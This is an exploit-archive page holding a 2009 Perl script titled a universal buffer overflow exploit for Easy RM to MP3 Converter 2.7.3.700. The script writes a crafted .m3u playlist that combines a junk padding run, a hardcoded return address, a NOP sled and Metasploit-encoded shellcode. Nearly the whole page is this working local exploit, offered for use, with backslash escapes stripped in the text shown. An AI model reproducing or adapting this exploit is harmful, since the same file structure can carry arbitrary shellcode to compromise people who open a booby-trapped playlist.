[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Easy RM to MP3 Converter 2.7.3.700 (.m3u) Universal BOF Exploit
# Published : 2009-07-16
# Author : Crazy_Hacker
# Previous Title : Hamster Audio Player 0.3a Universal Buffer Overflow Exploit (SEH)
# Next Title : Icarus 2.0 (.ICP File) Local Buffer Overflow Exploit (SEH)
#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Author: Crazy_Hacker
# Download : http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Greetz : Thugz_Hacker,Syrian Hacker,Golden_z3ro,Managerplay
# Home : www.sec-t.com
# viva Xhackers Team ;)
# welcome back Milw0rm
print "nn################################################## n";
print "Exploit By : Crazy_Hacker n";
print "Vurnable Pro : Easy RM to MP3 Converter 2.7.3.700 n";
print "Tested on : Windows XP SP2 (En) n";
print "Description : Stack Local Buffer Oveflow n";
print "File type : .m3u n";
print "################################################## n";
$junk = "x41" x 26061;
$ret = "x0Fx3FxA1x01"; # => Universal Address (MSRMCcodec02.dll)
$nopsled = "x90" x 20;
# windows/exec - 144 bytes thanks to metasploit Encoder: x86/shikata_ga_nai EXITFUNC=seh, CMD=calc
$shellcode =
"xdbxdfxbdxe4x47x45x20xd9x74x24xf4x5fx33xc9" .
"xb1x1ex83xefxfcx31x6fx14x03x6fxf0xa5xb0xdc" .
"x10x6dx3bx1dxe0xe5x7ex21x6bx85x85x21x6ax99" .
"x0dx9ex74xeex4dx01x85x1bx38xcaxb1x50xbax22" .
"x88xa6x24x16x6exe6x23x60xafx2dxc6x6fxedx59" .
"x2dx54xa5xb9xcaxdexa0x49x8dx04x2bxa5x54xce" .
"x27x72x12x8fx2bx85xcfxbbx4fx0ex0ex57xe6x4c" .
"x35xa3x3bx33x04x5dxdbx9ax02x2ax5dx13x40x6c" .
"x6dxd8x26x71xc0x55xaex81x93x92xacx52xc9x32" .
"xdbxa2x87xb7x44x2bx0fx49xf0xa5x78x49xe2xd9" .
"xe7xd9x8ex1d";
$exploit = $junk.$ret.$nopsled.$shellcode;
print "n[+] Creating Exploit File ...n";
open($cc ,">Exploit.m3u");
print $cc $exploit;
close($cc);
print "[+] Exploit File Created (Exploit.m3u)n";
# www.Syue.com [2009-07-16]